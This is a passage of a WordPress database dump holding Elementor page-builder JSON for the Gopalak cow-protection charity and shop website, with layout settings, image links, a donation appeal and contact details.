,\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12233,2007,'_elementor_page_assets','a:0:{}'),(12235,2008,'_elementor_edit_mode','builder'),(12236,2008,'_elementor_template_type','wp-page'),(12237,2008,'_elementor_version','3.7.8'),(12238,2008,'_wp_page_template','elementor_canvas'),(12239,2008,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well 